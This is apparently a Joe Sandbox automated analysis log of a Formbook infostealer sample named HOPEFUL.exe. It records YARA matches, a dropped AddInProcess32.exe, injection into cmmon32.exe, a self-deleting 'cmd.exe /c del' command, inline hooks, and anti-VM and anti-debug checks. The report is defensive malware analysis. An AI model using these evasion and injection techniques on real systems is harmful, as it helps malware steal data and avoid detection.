          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041E197
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041D313
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00409E40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041D63C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00409E3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041DF97
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041DFAA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00DE2050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E25DD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181F900
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E2D07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01810D20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01834120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E1D55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182B090
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E20A8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E28EC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1002
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182841F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184EBB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DDBD2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E1FF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E2B28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E22AE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E2EF7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01836E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFB090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFD5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E12581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB1D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E04120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEF900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE0D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E06E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDE197
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EC2D87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EC2D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EC9E40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EC9E3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDDFAA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EC2FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDDF97
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0181B150 appears 35 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04DEB150 appears 32 times
          Source: HOPEFUL.exeBinary or memory string: OriginalFilename vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000002.296333169.0000000003121000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAddInProcess32.exeT vs HOPEFUL.exe
          Source: HOPEFUL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@4/3
          Source: C:\Users\user\Desktop\HOPEFUL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HOPEFUL.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
          Source: C:\Users\user\Desktop\HOPEFUL.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: HOPEFUL.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HOPEFUL.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\HOPEFUL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: HOPEFUL.exeReversingLabs: Detection: 31%
          Source: unknownProcess created: C:\Users\user\Desktop\HOPEFUL.exe 'C:\Users\user\Desktop\HOPEFUL.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\HOPEFUL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: HOPEFUL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HOPEFUL.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: HOPEFUL.exeStatic file information: File size 3437056 > 1048576
          Source: HOPEFUL.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x346600
          Source: HOPEFUL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: cmmon32.pdb source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, cmmon32.exe, 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmmon32.exe
          Source: Binary string: AddInProcess32.pdbpw source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, 00000005.00000002.341420581.0000000000DE2000.00000002.00020000.sdmp, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F005E6 pushfd ; iretd
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F04E9A push es; iretd
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F04B71 push es; iretd
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 0_2_02F00A2A push ds; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041CEB5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041CF6C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041CF02 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0041CF0B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0186D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E3D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDD856 push esi; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDCF6C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDCF0B push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_00EDCF02 push eax; ret
          Source: C:\Users\user\Desktop\HOPEFUL.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\HOPEFUL.exeFile opened: C:\Users\user\Desktop\HOPEFUL.exe\:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE0
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000EC98E4 second address: 0000000000EC98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000EC9B5E second address: 0000000000EC9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\HOPEFUL.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HOPEFUL.exeWindow / User API: threadDelayed 851
          Source: C:\Users\user\Desktop\HOPEFUL.exeWindow / User API: threadDelayed 9007
          Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6816Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6816Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6820Thread sleep count: 851 > 30
          Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6820Thread sleep count: 9007 > 30
          Source: C:\Windows\explorer.exe TID: 5888Thread sleep count: 33 > 30
          Source: C:\Windows\explorer.exe TID: 5888Thread sleep time: -66000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5408Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: vmware svga
          Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000D.00000000.318372391.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: tpautoconnsvc#Microsoft Hyper-V
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: cmd.txtQEMUqemu
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: vmusrvc
          Source: explorer.exe, 0000000D.00000002.573815285.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: vmsrvc
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: vmtools
          Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
          Source: explorer.exe, 0000000D.00000000.310824417.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: vboxservicevbox)Microsoft Virtual PC
          Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmpBinary or memory string: virtual-vmware pointing device
          Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00409A90 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]
